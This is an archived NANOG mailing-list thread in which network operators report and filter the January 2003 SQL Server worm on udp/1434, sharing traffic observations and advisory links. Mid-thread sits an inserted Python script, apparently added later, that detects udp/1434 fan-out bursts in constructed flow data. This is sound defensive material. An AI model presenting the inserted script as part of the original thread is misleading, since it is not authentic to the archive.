It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
This may well be the exploit being used: http://www.nextgenss.com/advisories/mssql-udp.txt

--Lloyd

On Sat, 25 Jan 2003, Dave Stewart wrote:

Date: Sat, 25 Jan 2003 01:50:03 -0500
From: Dave Stewart <dbs@dbscom.com>
To: nanog@merit.edu
Subject: Re: New worm / port 1434?
At 01:32 AM 1/25/2003, you wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Agreed... shutting down MSSQL stopped the flood here.... now to find it and remove it
* Avleen Vig <lists-nanog@silverwraith.com> [20030124 22:44]:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
A preliminary look at some of our NetFlow data shows a suspect ICMP payload delivered to one of our downstream colo customer boxes followed by a 70 Mbit/s burst from them. The burst consisted of traffic to seemingly random destinations on 1434/udp. This customer typically does about 0.250 Mbit/s so this was a bit out of their profile. :-) Needless to say, we shut them down per a suspected security incident. The ICMP came from 66.214.194.31 though that could quite easily be forged or just another compromised box. We're seeing red to many networks all over the world though our network seems to have quieted down a bit. Sounds like a DDoS in the works.

Anyone else able to corroborate/compare notes?

-jr

----
Josh Richards <jrichard@{ geekresearch.com, cubicle.net, digitalwest.net }>
Geek Research, LLC - Digital West Networks, Inc - San Luis Obispo, CA
KG6CYK - IP/Unix/telecom/knowledge/coffee/security/crypto/business/geek
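One way to turn the NetFlow observation above (a colo host jumping from its usual 0.25 Mbit/s to a burst of udp/1434 traffic toward seemingly random destinations) into a repeatable check. This is an added example, not code from Josh or anyone else on the thread; the flow-record layout, the constructed sample flows, the baseline table and the thresholds are all assumptions.

```python
"""Flag colo hosts whose udp/1434 fan-out is far above their usual profile.

Added example, not code from anyone on this thread. Flow records are
constructed NetFlow-style tuples (src, dst, proto, dport, bytes) for one
slice of `window_seconds`; layout, baselines and thresholds are assumptions.
"""
from collections import defaultdict

# Constructed sample: 10.0.0.7 sprays one 404-byte datagram (376-byte UDP
# payload plus IP/UDP headers) at every host in three TEST-NET /24s, while
# 10.0.0.5 serves web traffic and 10.0.0.9 talks to a single SQL server.
SAMPLE_FLOWS = [
    ("10.0.0.5", "192.0.2.10", "tcp", 80, 30_000),
    ("10.0.0.9", "198.51.100.50", "udp", 1434, 2_000),
    ("10.0.0.7", "198.51.100.5", "tcp", 25, 4_000),
] + [
    ("10.0.0.7", f"{net}.{host}", "udp", 1434, 404)
    for net in ("192.0.2", "198.51.100", "203.0.113")
    for host in range(1, 255)
]

# Usual per-host rate in bit/s learned from earlier traffic (constructed).
BASELINE_BPS = {"10.0.0.5": 250_000, "10.0.0.7": 250_000, "10.0.0.9": 250_000}


def profile(flows, window_seconds=1):
    """Per source: (distinct udp/1434 destinations, total bit/s in the window)."""
    fanout = defaultdict(set)
    bits = defaultdict(int)
    for src, dst, proto, dport, nbytes in flows:
        bits[src] += nbytes * 8
        if proto == "udp" and dport == 1434:
            fanout[src].add(dst)
    return {src: (len(fanout[src]), bits[src] / window_seconds) for src in bits}


def suspect_hosts(flows, baseline_bps, min_fanout=50, burst_factor=8):
    """Sources spraying many distinct udp/1434 targets while well above profile.

    A single SQL client stays under min_fanout and a busy but normal host has
    no 1434 fan-out, so only the host doing both is reported.
    """
    flagged = []
    for src, (dests, bps) in profile(flows).items():
        base = baseline_bps.get(src, 250_000)  # assumed default profile
        if dests >= min_fanout and bps >= burst_factor * base:
            flagged.append(src)
    return sorted(flagged)


if __name__ == "__main__":
    for host in suspect_hosts(SAMPLE_FLOWS, BASELINE_BPS):
        print(f"{host}: udp/1434 fan-out burst; candidate for a 1434/udp filter")
```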
### On Fri, 24 Jan 2003 22:59:17 -0800, Josh Richards <jrichard@cubicle.net>
### casually decided to expound upon nanog@nanog.org the following thoughts
### about "Re: New worm / port 1434?":

JR> * Avleen Vig <lists-nanog@silverwraith.com> [20030124 22:44]:
JR> >
JR> > It seems we have a new worm hitting Microsoft SQL server servers on port
JR> > 1434.
JR>
JR> A preliminary look at some of our NetFlow data shows a suspect ICMP payload
JR> delivered to one of our downstream colo customer boxes followed by a
JR> 70 Mbit/s burst from them. The burst consisted of traffic to seemingly random
JR> destinations on 1434/udp. This customer typically does about 0.250 Mbit/s
JR> so this was a bit out of their profile. :-) Needless to say, we shut them
JR> down per a suspected security incident. The ICMP came from 66.214.194.31
JR> though that could quite easily be forged or just another compromised box.
JR> We're seeing red to many networks all over the world though our network seems
JR> to have quieted down a bit. Sounds like a DDoS in the works.
JR>
JR> Anyone else able to corroborate/compare notes?

First attack packet came in around 2130PST. A tcpdump reveals this:

Jan 25 00:05:49.880553 64.159.86.99.2321 > 66.166.158.240.1434: [udp sum ok] udp 376 (ttl 120, id 53207)

--
/*===================[ Jake Khuon <khuon@NEEBU.Net> ]======================+
| Packet Plumber, Network Engineers     /| / [~ [~ |) | |   --------------- |
| for Effective Bandwidth Utilisation  / |/ [_ [_ |) |_| N E T W O R K S   |
+=========================================================================*/
Note, further analysis makes me believe that the ICMP we saw immediately beforehand was a coincidence and unrelated. The origin of the ICMP has been traced to a customer application.

-jr

* Josh Richards <jrichard@cubicle.net> [20030125 00:21]:
A preliminary look at some of our NetFlow data shows a suspect ICMP payload delivered to one of our downstream colo customer boxes followed by a 70 Mbit/s burst from them. The burst consisted of traffic to seemingly random destinations on 1434/udp. This customer typically does about 0.250 Mbit/s so this was a bit out of their profile. :-) Needless to say, we shut them down per a suspected security incident. The ICMP came from 66.214.194.31 though that could quite easily be forged or just another compromised box. We're seeing red to many networks all over the world though our network seems to have quieted down a bit. Sounds like a DDoS in the works.
Anyone else able to corroborate/compare notes?
----
Josh Richards <jrichard@{ geekresearch.com, cubicle.net, digitalwest.net }>
Geek Research, LLC - Digital West Networks, Inc - San Luis Obispo, CA
KG6CYK - IP/Unix/telecom/knowledge/coffee/security/crypto/business/geek
Duplicated info.. But this is an old worm ;-(

http://www.cert.org/advisories/CA-1996-01.html

Pete Ashdown wrote:
* Avleen Vig (lists-nanog@silverwraith.com) [030124 23:50] writeth:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Affirmative. Be sure to block 1434 UDP on both the inbound and the outbound. Infected servers are VERY NOISY.
On Sat, Jan 25, 2003 at 08:05:33AM +0000, Gary Coates wrote:
Duplicated info.. But this is an old worm ;-(
This is not the worm that's spreading now.

Greetz, Peter
--
peter@dataloss.nl | http://www.dataloss.nl/ | Undernet:#clue
We had to go through each VLAN to determine which boxes were compromised, looks like W2K SQL. This thing is spreading fast.

-D

0. Pete Ashdown <pashdown@xmission.com> farted:
* Avleen Vig (lists-nanog@silverwraith.com) [030124 23:50] writeth:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Affirmative. Be sure to block 1434 UDP on both the inbound and the outbound. Infected servers are VERY NOISY.
--
--------------
http://www.zeromemory.com - metal for your ears.
Yes, I am seeing this big time. Are you sure it's SQL server? That's normally 1433, no? Are there any other details somewhere about this?

At 10:32 PM 1/24/2003 -0800, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400          Sentex Communications, mike@sentex.net
Providing Internet since 1994             www.sentex.net
Cambridge, Ontario Canada                 www.sentex.net/mike
From: "Mike Tancsa"
Yes, I am seeing this big time. Are you sure it's SQL server? That's normally 1433, no? Are there any other details somewhere about this?
<snip>

All MS SQL servers listen on 1434 regardless of the other ports they listen on. Which other ports it uses depends on the configuration (due to various security models), but 1434 is a constant in all configurations, according to a quick search and a read of the last MS SQL vulnerability found in 7/2002.

Jack Bates
BrightNet Oklahoma
At 02:45 AM 1/25/2003 -0600, Jack Bates wrote:
From: "Mike Tancsa"
Yes, I am seeing this big time. Are you sure it's SQL server? That's normally 1433, no? Are there any other details somewhere about this?
<snip>
All MS SQL servers listen on 1434 regardless of the other ports they listen on. Which other ports it uses depends on the configuration (due to various security models), but 1434 is a constant in all configurations, according to a quick search and a read of the last MS SQL vulnerability found in 7/2002.
Thanks, I have blocked the infected hosts in my customer colo space. It's an eye opener how much traffic they generate on the local collision domain they are on :-(

---Mike

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400          Sentex Communications, mike@sentex.net
Providing Internet since 1994             www.sentex.net
Cambridge, Ontario Canada                 www.sentex.net/mike
1434 is the SQL Server Resolution Service. Unfortunately, this appears to be a whole new thing; I was unable to find anything more recent than May of 2002 about security issues with this port.

Thanks,
Adam Debus
Network Administrator, ReachONE Internet
adam@reachone.com

----- Original Message -----
From: "Mike Tancsa" <mike@sentex.net>
To: "Avleen Vig" <lists-nanog@silverwraith.com>
Cc: <nanog@nanog.org>
Sent: Friday, January 24, 2003 11:19 PM
Subject: Re: New worm / port 1434?
Yes, I am seeing this big time. Are you sure it's SQL server? That's normally 1433, no? Are there any other details somewhere about this?
At 10:32 PM 1/24/2003 -0800, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400          Sentex Communications, mike@sentex.net
Providing Internet since 1994             www.sentex.net
Cambridge, Ontario Canada                 www.sentex.net/mike
On Sat Jan 25, 2003 at 02:19:04AM -0500, Mike Tancsa wrote:
Yes, I am seeing this big time. Are you sure it's SQL server? That's normally 1433, no? Are there any other details somewhere about this?
This URL seems to explain the exploit: http://www.nextgenss.com/advisories/mssql-udp.txt

Simon
--
Simon Lockhart        | Tel: +44 (0)1628 407720 (BBC ext 37720)
Technology Manager    | Fax: +44 (0)1628 407701 (BBC ext 37701)
BBC Internet Services | Email: Simon.Lockhart@bbc.co.uk
BBC Technology, Maiden House, Vanwall Road, Maidenhead. SL6 4UB. UK
http://securityresponse.symantec.com/avcenter/venc/data/w32.sqlexp.worm.html

----- Original Message -----
From: "Simon Lockhart" <simonl@rd.bbc.co.uk>
To: "Mike Tancsa" <mike@sentex.net>
Cc: "Avleen Vig" <lists-nanog@silverwraith.com>; <nanog@nanog.org>
Sent: Saturday, January 25, 2003 3:48 AM
Subject: Re: New worm / port 1434?

On Sat Jan 25, 2003 at 02:19:04AM -0500, Mike Tancsa wrote:

Yes, I am seeing this big time. Are you sure it's SQL server? That's normally 1433, no? Are there any other details somewhere about this?

This URL seems to explain the exploit:
http://www.nextgenss.com/advisories/mssql-udp.txt

Simon
--
Simon Lockhart        | Tel: +44 (0)1628 407720 (BBC ext 37720)
Technology Manager    | Fax: +44 (0)1628 407701 (BBC ext 37701)
BBC Internet Services | Email: Simon.Lockhart@bbc.co.uk
BBC Technology, Maiden House, Vanwall Road, Maidenhead. SL6 4UB. UK
Anyone else dealing with this tonight? It's kind of nasty

-Scotty

----- Original Message -----
From: "Avleen Vig" <lists-nanog@silverwraith.com>
To: <nanog@nanog.org>
Sent: Saturday, January 25, 2003 1:32 AM
Subject: New worm / port 1434?
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
Anyone else dealing with this tonight? It's kind of nasty

It's very nasty, and it happened at the worst time, after 17:00 GMT, so contacting customers hasn't been easy. We've deployed filters on systems that are under attack and continue to monitor the situation; it's caused lots of DNS issues with people using MS SQL as a DNS backend.

Regards,
Neil
Yep - we are seeing 3 compromised SQL boxes right now.

Mark Radabaugh
Amplex
(419) 720-3635

----- Original Message -----
From: "Avleen Vig" <lists-nanog@silverwraith.com>
To: <nanog@nanog.org>
Sent: Saturday, January 25, 2003 1:32 AM
Subject: New worm / port 1434?
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
I'm seeing obscene amounts of 1434/udp traffic at my transit and peering points. I've filtered it out in both directions everywhere my network touches the outside world. It's almost 20% of my traffic at this point. I think I've calmed the internal storm so far, but we'll see.

I saw reference to an ICMP "trigger" packet. Is there any info on this and is it possible to filter for it w/o killing all ICMP traffic? It'd be nice to know I won't have any more routers or switches fall over tonight.

Colo customers seem to be the worst off, the rate limiting kills the router or the traffic kills the backbone. Decisions, decisions...

-S
--
Scott Call  Router Geek, ATGi, home of $6.95 Prime Rib
"Nothing is less productive than to make more efficient what should not be done at all." -Peter Drucker
We detected this traffic and blocked it. It was more widespread within our network than the usual DDoS attacks we see. Curious to hear how significant this one is or will be.

On Fri, 24 Jan 2003, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
We are seeing this too. We are seeing the gige interfaces on multiple customer aggregation switches at multiple locations add several hundred Mbps each. All the traffic is destined for udp port 1434 with a randomized source address. We are doing "ip verify unicast source reachable-via any" which stops most of the random addresses. We've temporarily had to block udp port 1434.

On Fri, 24 Jan 2003, Avleen Vig wrote:
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
+----------------- H U R R I C A N E - E L E C T R I C -----------------+
| Mike Leber       Direct Internet Connections       Voice 510 580 4100 |
| Hurricane Electric      Web Hosting  Colocation      Fax 510 580 4151 |
| mleber@he.net                                       http://www.he.net |
+-----------------------------------------------------------------------+
On Sat, Jan 25, 2003 at 12:12:37AM -0800, Mike Leber wrote:
We are seeing this too. We are seeing the gige interfaces on multiple customer aggregation switches at multiple locations add several hundred Mbps each. All the traffic is destined for udp port 1434 with a randomized source address. We are doing "ip verify unicast source reachable-via any" which stops most of the random addresses. We've temporarily had to block udp port 1434.
USD10 to the first person who spots a CNN reporter speculating to Saddam's involvement.
On Sat, 25 Jan 2003, Avleen Vig wrote:
On Sat, Jan 25, 2003 at 12:12:37AM -0800, Mike Leber wrote:
We are seeing this too. We are seeing the gige interfaces on multiple customer aggregation switches at multiple locations add several hundred Mbps each. All the traffic is destined for udp port 1434 with a randomized source address. We are doing "ip verify unicast source reachable-via any" which stops most of the random addresses. We've temporarily had to block udp port 1434.
USD10 to the first person who spots a CNN reporter speculating to Saddam's involvement.
I didn't realise he was such a computer expert!
We were hit hard by this as well. It appears to be a buffer overflow exploit, as blocking the ports on my router and restarting MS SQL put a stop to it.

Thanks,
Adam Debus
Network Administrator, ReachONE Internet
adam@reachone.com

----- Original Message -----
From: "Avleen Vig" <lists-nanog@silverwraith.com>
To: <nanog@nanog.org>
Sent: Friday, January 24, 2003 10:32 PM
Subject: New worm / port 1434?
It seems we have a new worm hitting Microsoft SQL server servers on port 1434.
participants (22)
- Adam "Tauvix" Debus
- Avleen Vig
- Curtis Maurand
- Dave Stewart
- Dr. Mosh
- Gary Coates
- Jack Bates
- Jake Khuon
- Josh Richards
- K. Scott Bethke
- Len Rose
- Lloyd Taylor
- Mark Radabaugh
- Mike Leber
- Mike Tancsa
- neil@DOMINO.ORG
- Pete Ashdown
- Peter van Dijk
- Scott Call
- Simon Lockhart
- Stephen J. Wilcox
- Troy Rader